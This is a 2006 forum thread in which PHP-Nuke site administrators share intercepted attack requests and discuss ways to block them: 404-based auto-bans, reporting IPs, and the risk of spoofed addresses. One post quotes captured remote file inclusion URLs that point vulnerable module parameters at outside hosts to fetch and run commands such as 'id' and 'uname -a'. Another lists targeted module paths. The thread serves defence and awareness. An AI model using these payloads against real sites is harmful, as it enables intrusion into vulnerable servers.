| Author |
Message |
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
 Posted:
Mon Mar 13, 2006 4:44 pm |
 
|
Ok peeps,,
perhaps raven agrees its a good idea to open a special forum for these warnings...,but untill them ill post them here...
Just recieved this attack,useless to me cause i dont have AllMyGuests installed...
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Mon Mar 13, 2006 5:39 pm |
|
Good to know 
I'll add everything I've seen if Raven wants to open a place to report them |
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Mon Mar 13, 2006 5:48 pm |
|
yes i did asked him to open a special forum for this...as he wanted to know more info on the idea i gave him that by pm.
Just have to wait what he thinks of it. |
|
|
|
|
|
Susann
Moderator
Joined: Dec 19, 2004
Posts: 2950
Location: Germany:Moderator German NukeSentinel Support
|
| Posted:
Mon Mar 13, 2006 6:15 pm |
|
Would be great to find an ultimate solution for this problem. |
|
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 5816
|
| Posted:
Mon Mar 13, 2006 8:11 pm |
|
Got my finger on the trigger, just point me in the right direction...just kidding! |
|
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 5909
|
| Posted:
Tue Mar 14, 2006 12:54 am |
|
Here are a couple I intercepted just within the last 24 hours;
| Quote: | | /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adxteam.ru/modules/tool25.dat?cmd=id |
| Quote: | | /modules/My_eGallery/index.php?basepath=http://www.adxteam.ru/modules/tool25.dat?cmd=id |
| Quote: | | /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id |
| Quote: | | /modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16759
Location: Kansas
|
| Posted:
Tue Mar 14, 2006 3:17 am |
|
I have been mulling this over since I got your PM. My main concern with this is that we would become a central repository for every script kiddie that gets a new 'puter from Mommy and Daddy. |
Last edited by Raven on Tue Mar 14, 2006 8:05 am; edited 1 time in total |
|
 
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Tue Mar 14, 2006 4:13 am |
|
I understand raven...
But there must be a way to do this,by making the forum for registered users....
And script kiddies usualy fail with their wannabe attemps..
And....sure we can post it in a way that we dont publish the full used url/directory.
Thing is also ,if you would use google you can find a lot on the web ,i think they wont gonna use this site to get resources or examples.
Were just publishing the way wannabe's used to do something.
what not will be published is the actual url/directory and dont forget that the actual script used isnt published also. |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Tue Mar 14, 2006 8:27 am |
|
Aye - script kiddies can just Google for the vulnerability though. I Google all the 404s I get, and the vulnerabilities pop right up to the top.
Perhaps a way to encrypt the search strings so that script kiddies can't read them directly? Integrate it into a distribution of Sentinel or another protection script.
Just report the IP hitting the site then? I'm using a very simple 404 redirect to do an autoban of vulnerabilities I've found hitting my site. These are obviously malacious attacks, so I have no qualms about banning the address. They will keep trying with other vulnerabilities. |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Tue Mar 14, 2006 8:40 am |
|
well im just talking about attacks on any nuke related mods...like i just posted a few..not actual attack scripts..
to post a few examples they have tried...
| Code: |
modules/My_eGallery/public
modules/4nAlbum/public/
modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR
modules/agendax/addevent.inc.php?agendax_path
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
|
Whoever reads this,keep in mind that the posted here was the actual target but in combination with certain scripts.
Like its posted now has no value whatsoever,but is merely to point out the stuff you should keep an eye on. |
|
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 5909
|
| Posted:
Tue Mar 14, 2006 8:58 am |
|
| evaders99 wrote: | | <snipped> I'm using a very simple 404 redirect to do an autoban of vulnerabilities I've found hitting my site. These are obviously malacious attacks, so I have no qualms about banning the address. They will keep trying with other vulnerabilities. |
But wouldnt this mean that if the IP was spoofed, it could potentially ban a legitimate IP? |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Tue Mar 14, 2006 11:39 am |
|
How is the IP spoofed? Either is it is a direct attacker or something going through a compromised server or known proxy |
|
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 5909
|
| Posted:
Wed Mar 15, 2006 12:35 am |
|
It is my understanding (please correct me if I am wrong) that by modifying a data packet header that it is possible to present an IP which is not neccessarily the same as the true or proxy IP - in other words that the IP address can be presented as anything a potential hacker wants you to think it is.
If it is possible to forge an IP address in this way, then if for example, the IP address of googles search bots were presented during a number of attack attempts, Sentinel would then end up banning google from your site. |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Wed Mar 15, 2006 8:36 am |
|
I haven't seen the technology available to do so. But any kind of software can be fiddled with.
I've only had a couple hundred bans though, few from western countries. I definitely report those to the ISP. Others are just known robots from Turkey, China, Brazil... |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16759
Location: Kansas
|
| Posted:
Wed Mar 15, 2006 8:48 am |
|
| Guardian2003 wrote: | It is my understanding (please correct me if I am wrong) that by modifying a data packet header that it is possible to present an IP which is not neccessarily the same as the true or proxy IP - in other words that the IP address can be presented as anything a potential hacker wants you to think it is.
If it is possible to forge an IP address in this way, then if for example, the IP address of googles search bots were presented during a number of attack attempts, Sentinel would then end up banning google from your site. |
You are quite correct. IP Spoofing is a common tactic. Normally these scripts are wriiten in perl. |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Wed Mar 15, 2006 10:46 am |
|
Ah so I'm reading, IP spoofing is more directed at DOS attacks. But it is certainly possible for people to use this to hide their hacking
Here's to all the headaches that hackers cause... gah.
Now to write some code to block automatically with Sentinel and I'll be set |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
